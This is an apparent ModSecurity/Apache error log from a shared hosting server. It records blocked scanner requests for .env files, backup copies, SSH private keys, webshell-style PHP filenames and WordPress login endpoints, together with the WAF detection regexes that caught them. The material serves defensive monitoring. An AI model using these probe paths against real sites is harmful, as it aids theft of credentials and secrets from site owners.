[Tue May 26 15:00:29.496991 2026] [security2:error] [pid 662057:tid 662295] [client 5.255.109.126:52990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.env.bak"] [unique_id "ahVoNfT3lMm9tGFVg9RgywAAAXY"]
[Tue May 26 15:00:29.605999 2026] [security2:error] [pid 662057:tid 662278] [client 5.255.109.126:53050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/app/.env"] [unique_id "ahVoNfT3lMm9tGFVg9Rg3gAAAWU"]
[Tue May 26 15:00:29.606011 2026] [security2:error] [pid 662057:tid 662276] [client 5.255.109.126:53056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/public/.env"] [unique_id "ahVoNfT3lMm9tGFVg9Rg4QAAAWM"]
[Tue May 26 15:00:30.409198 2026] [security2:error] [pid 662057:tid 662281] [client 5.255.109.126:52940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.env.backup"] [unique_id "ahVoNvT3lMm9tGFVg9Rg_gAAAWg"]
[Tue May 26 15:00:30.409892 2026] [security2:error] [pid 662057:tid 662241] [client 5.255.109.126:52882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.env.old"] [unique_id "ahVoNvT3lMm9tGFVg9RhAQAAAUA"]
[Tue May 26 15:00:30.414141 2026] [security2:error] [pid 662057:tid 662228] [client 5.255.109.126:53006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/backend/.env"] [unique_id "ahVoNvT3lMm9tGFVg9RhAgAAATM"]
[Tue May 26 15:00:30.415579 2026] [security2:error] [pid 662057:tid 662210] [client 5.255.109.126:52926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVoNvT3lMm9tGFVg9RhBAAAASE"]
[Tue May 26 15:00:30.415581 2026] [security2:error] [pid 662057:tid 662247] [client 5.255.109.126:52952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVoNvT3lMm9tGFVg9RhAwAAAUY"]
[Tue May 26 15:00:30.416710 2026] [security2:error] [pid 662057:tid 662198] [client 5.255.109.126:53066] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/api/.env"] [unique_id "ahVoNvT3lMm9tGFVg9RhBQAAARU"]
[Tue May 26 15:00:31.065641 2026] [security2:error] [pid 662057:tid 662188] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoNvT3lMm9tGFVg9RhEQAAAQs"]
[Tue May 26 15:00:31.709679 2026] [security2:error] [pid 662057:tid 662239] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoN_T3lMm9tGFVg9RhNQAAAT4"], referer: https://www.anujtradingco.com/
[Tue May 26 15:00:31.995783 2026] [security2:error] [pid 662057:tid 662187] [client 195.178.110.34:38014] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/local/.env"] [unique_id "ahVoN_T3lMm9tGFVg9RhWAAAAQo"]
[Tue May 26 15:00:32.825400 2026] [security2:error] [pid 662057:tid 662293] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoOPT3lMm9tGFVg9RhdwAAAXQ"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1460507&moderation-hash=383c338c12fc424a1691f21077c966b7
[Tue May 26 15:00:33.397814 2026] [security2:error] [pid 662057:tid 662291] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoOPT3lMm9tGFVg9RhgQAAAXI"]
[Tue May 26 15:00:34.563823 2026] [security2:error] [pid 662057:tid 662283] [client 195.178.110.34:35942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/core/.env"] [unique_id "ahVoOvT3lMm9tGFVg9RhtwAAAWo"]
[Tue May 26 15:00:35.360976 2026] [security2:error] [pid 662057:tid 662174] [remote 74.7.241.58:39460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVoO_T3lMm9tGFVg9Rh4QABVnQ"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 15:00:35.740798 2026] [security2:error] [pid 662057:tid 662227] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoO_T3lMm9tGFVg9Rh3AAAATI"]
[Tue May 26 15:00:37.978468 2026] [security2:error] [pid 662057:tid 662157] [remote 173.252.69.36:54792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.69.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVoPfT3lMm9tGFVg9RiOgABVWM"]
[Tue May 26 15:00:38.115005 2026] [security2:error] [pid 662057:tid 662192] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoPfT3lMm9tGFVg9RiNQAAAQ8"]
[Tue May 26 15:00:40.203024 2026] [security2:error] [pid 662057:tid 662193] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoP_T3lMm9tGFVg9RihwAAARA"]
[Tue May 26 15:00:40.216515 2026] [fcgid:warn] [pid 662057:tid 662306] (70014)End of file found: [client 66.132.195.78:43316] mod_fcgid: can't get data from http client
[Tue May 26 15:00:41.506067 2026] [security2:error] [pid 662057:tid 662257] [client 195.178.110.34:35958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/core/.env"] [unique_id "ahVoQfT3lMm9tGFVg9RiyQAAAVA"]
[Tue May 26 15:00:41.908145 2026] [security2:error] [pid 662057:tid 662300] [client 136.243.220.209:19694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoQfT3lMm9tGFVg9Ri2gAAAXs"]
[Tue May 26 15:00:42.095697 2026] [security2:error] [pid 662057:tid 662304] [client 113.190.59.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoQvT3lMm9tGFVg9Ri3wAAAX8"]
[Tue May 26 15:00:42.335213 2026] [security2:error] [pid 662057:tid 662194] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoQfT3lMm9tGFVg9Ri1wAAARE"]
[Tue May 26 15:00:42.493820 2026] [security2:error] [pid 662057:tid 662313] [client 113.190.59.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoQvT3lMm9tGFVg9Ri8AAAAYg"]
[Tue May 26 15:00:42.692066 2026] [security2:error] [pid 662057:tid 662264] [client 154.161.32.97:57087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoQvT3lMm9tGFVg9Ri8wAAAVc"]
[Tue May 26 15:00:42.692067 2026] [security2:error] [pid 662057:tid 662295] [client 154.161.32.97:57088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoQvT3lMm9tGFVg9Ri9AAAAXY"]
[Tue May 26 15:00:42.692187 2026] [security2:error] [pid 662057:tid 662295] [client 154.161.32.97:57088] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoQvT3lMm9tGFVg9Ri9AAAAXY"]
[Tue May 26 15:00:42.692198 2026] [security2:error] [pid 662057:tid 662264] [client 154.161.32.97:57087] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoQvT3lMm9tGFVg9Ri8wAAAVc"]
[Tue May 26 15:00:43.523730 2026] [security2:error] [pid 662057:tid 662249] [client 4.193.189.92:8631] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "doyecpa.com"] [uri "/1.php"] [unique_id "ahVoQ_T3lMm9tGFVg9RjCwAAAUg"]
[Tue May 26 15:00:43.581078 2026] [security2:error] [pid 662057:tid 662249] [client 4.193.189.92:8631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/1.php"] [unique_id "ahVoQ_T3lMm9tGFVg9RjCwAAAUg"]
[Tue May 26 15:00:44.314341 2026] [security2:error] [pid 662057:tid 662280] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoQ_T3lMm9tGFVg9RjGwAAAWc"]
[Tue May 26 15:00:44.356023 2026] [security2:error] [pid 662057:tid 662304] [client 4.193.189.92:11559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/2.php"] [unique_id "ahVoRPT3lMm9tGFVg9RjIgAAAX8"]
[Tue May 26 15:00:45.132481 2026] [security2:error] [pid 662057:tid 662264] [client 4.193.189.92:11460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/7.php"] [unique_id "ahVoRfT3lMm9tGFVg9RjOgAAAVc"]
[Tue May 26 15:00:45.887211 2026] [security2:error] [pid 662057:tid 662241] [client 4.193.189.92:1774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/10.php"] [unique_id "ahVoRfT3lMm9tGFVg9RjVgAAAUA"]
[Tue May 26 15:00:46.261700 2026] [security2:error] [pid 662057:tid 662195] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoRfT3lMm9tGFVg9RjVQAAARI"]
[Tue May 26 15:00:46.672341 2026] [security2:error] [pid 662057:tid 662228] [client 4.193.189.92:4908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/13.php"] [unique_id "ahVoRvT3lMm9tGFVg9RjcwAAATM"]
[Tue May 26 15:00:46.998026 2026] [security2:error] [pid 662057:tid 662253] [client 114.119.155.228:61949] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVoRvT3lMm9tGFVg9RjdwAAAUw"], referer: http://haddingtonwines.com/cart?remove_item=f8905bd3df64ace64a68e154ba72f24c
[Tue May 26 15:00:47.414211 2026] [security2:error] [pid 662057:tid 662260] [client 4.193.189.92:9038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/100.php"] [unique_id "ahVoR_T3lMm9tGFVg9RjhwAAAVM"]
[Tue May 26 15:00:48.159327 2026] [security2:error] [pid 662057:tid 662291] [client 4.193.189.92:4871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/222.php"] [unique_id "ahVoSPT3lMm9tGFVg9RjlAAAAXI"]
[Tue May 26 15:00:48.888034 2026] [security2:error] [pid 662057:tid 662277] [client 4.193.189.92:12350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/adminfuns.php"] [unique_id "ahVoSPT3lMm9tGFVg9RjpAAAAWQ"]
[Tue May 26 15:00:49.159537 2026] [security2:error] [pid 662057:tid 662312] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoSPT3lMm9tGFVg9RjnQAAAYc"]
[Tue May 26 15:00:49.655613 2026] [security2:error] [pid 662057:tid 662212] [client 4.193.189.92:10286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/abcd.php"] [unique_id "ahVoSfT3lMm9tGFVg9RjsgAAASM"]
[Tue May 26 15:00:49.771592 2026] [security2:error] [pid 662057:tid 662257] [client 195.178.110.34:57256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/apps/.env"] [unique_id "ahVoSfT3lMm9tGFVg9RjtgAAAVA"]
[Tue May 26 15:00:50.407024 2026] [security2:error] [pid 662057:tid 662285] [client 4.193.189.92:6414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/al.php"] [unique_id "ahVoSvT3lMm9tGFVg9RjwAAAAWw"]
[Tue May 26 15:00:50.995143 2026] [security2:error] [pid 662057:tid 662196] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoSvT3lMm9tGFVg9RjxwAAARM"]
[Tue May 26 15:00:51.144644 2026] [security2:error] [pid 662057:tid 662190] [client 4.193.189.92:5707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/alfa.php"] [unique_id "ahVoS_T3lMm9tGFVg9Rj1AAAAQ0"]
[Tue May 26 15:00:51.931935 2026] [security2:error] [pid 662057:tid 662207] [client 4.193.189.92:12322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/as.php"] [unique_id "ahVoS_T3lMm9tGFVg9Rj5wAAAR4"]
[Tue May 26 15:00:52.685241 2026] [security2:error] [pid 662057:tid 662310] [client 4.193.189.92:13059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/aa.php"] [unique_id "ahVoTPT3lMm9tGFVg9Rj_AAAAYU"]
[Tue May 26 15:00:53.104524 2026] [security2:error] [pid 662057:tid 662276] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoTPT3lMm9tGFVg9Rj-AAAAWM"]
[Tue May 26 15:00:53.469714 2026] [security2:error] [pid 662057:tid 662304] [client 4.193.189.92:13092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/abc.php"] [unique_id "ahVoTfT3lMm9tGFVg9RkEwAAAX8"]
[Tue May 26 15:00:54.230274 2026] [security2:error] [pid 662057:tid 662247] [client 4.193.189.92:10965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/av.php"] [unique_id "ahVoTvT3lMm9tGFVg9RkIAAAAUY"]
[Tue May 26 15:00:54.621351 2026] [security2:error] [pid 662057:tid 662177] [remote 167.71.130.119:52042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVoTvT3lMm9tGFVg9RkJAABFHc"]
[Tue May 26 15:00:54.993098 2026] [security2:error] [pid 662057:tid 662222] [client 4.193.189.92:10983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/autoload_classmap.php"] [unique_id "ahVoTvT3lMm9tGFVg9RkNAAAAS0"]
[Tue May 26 15:00:55.816260 2026] [security2:error] [pid 662057:tid 662301] [client 4.193.189.92:6400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/asus.php"] [unique_id "ahVoT_T3lMm9tGFVg9RkQwAAAXw"]
